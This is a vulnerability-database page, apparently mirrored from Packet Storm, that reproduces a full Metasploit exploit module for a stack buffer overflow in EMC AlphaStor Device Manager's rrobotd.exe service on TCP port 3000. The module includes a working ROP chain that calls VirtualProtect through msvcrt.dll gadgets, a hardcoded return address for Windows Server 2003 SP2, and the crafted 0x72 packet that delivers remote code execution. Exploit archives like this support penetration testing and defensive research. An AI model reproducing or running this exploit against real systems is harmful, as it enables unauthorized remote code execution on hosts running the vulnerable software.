Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

EMC AlphaStor Device Manager Opcode 0x72 Buffer Overflow

🗓️ 14 Sep 2017 00:00:00Reported by James FittsType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

EMC AlphaStor Device Manager Opcode 0x72 Buffer Overflo

Code
`require 'msf/core'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'EMC AlphaStor Device Manager Opcode 0x72',  
'Description' => %q{  
This module exploits a stack based buffer overflow vulnerability  
found in EMC Alphastor Device Manager. The overflow is triggered  
when sending a specially crafted packet to the rrobotd.exe service  
listening on port 3000. During the copying of strings to the stack  
an unbounded sprintf() function overwrites the return pointer  
leading to remote code execution.  
},  
'Author' => [ 'James Fitts' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: $',  
'References' =>  
[  
[ 'URL', '0day' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Privileged' => true,  
'Payload' =>  
{  
'Space' => 160,  
'DisableNops' => 'true',  
'BadChars' => "\x00\x09\x0a\x0d",  
'StackAdjustment' => -404,  
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",  
'Compat' =>   
{  
'ConnectionType' => '+ws2ord',  
}  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[   
'Windows Server 2003 SP2 EN',   
{   
# pop eax/ retn  
# msvcrt.dll  
'Ret' => 0x77bc5d88,   
}   
],  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Feb 14 2013'))  
  
register_options(  
[  
Opt::RPORT(3000)  
], self.class )  
end  
  
def exploit  
connect  
  
# msvcrt.dll  
# 96 bytes  
rop = [  
0x77bb2563, # pop eax/ retn   
0x77ba1114, # ptr to kernel32!virtualprotect  
0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn  
0xfeedface,  
0x77bb0c86, # xchg eax, esi/ retn  
0x77bc9801, # pop ebp/ retn  
0x77be2265,  
0x77bb2563, # pop eax/ retn  
0x03C0990F,  
0x77bdd441, # sub eax, 3c0940fh/ retn  
0x77bb48d3, # pop eax/ retn  
0x77bf21e0,  
0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn  
0x77bbfc02, # pop ecx/ retn  
0x77bef001,  
0x77bd8c04, # pop edi/ retn  
0x77bd8c05,  
0x77bb2563, # pop eax/ retn  
0x03c0984f,  
0x77bdd441, # sub eax, 3c0940fh/ retn  
0x77bb8285, # xchg eax, edx/ retn  
0x77bb2563, # pop eax/ retn  
0x90909090,  
0x77be6591, # pushad/ add al, 0efh/ retn  
].pack("V*")  
  
buf = "\xcc" * 550  
buf[246, 4] = [target.ret].pack('V')  
buf[250, 4] = [0x77bf6f80].pack('V')  
buf[254, rop.length] = rop  
buf[350, payload.encoded.length] = payload.encoded  
  
packet = "\x72#{buf}"  
  
print_status("Trying target %s..." % target.name)  
  
sock.put(packet)  
  
handler  
disconnect  
end  
  
end  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Sep 2017 00:00Current
1.4Low risk
Vulners AI Score1.4
emc alphastorbuffer overflowremote code executionmsf modulestack overflowtcp connectionexploitrop gadgetpayloadkernel32 virtualprotectwindows server 2003 sp2disclosure date
25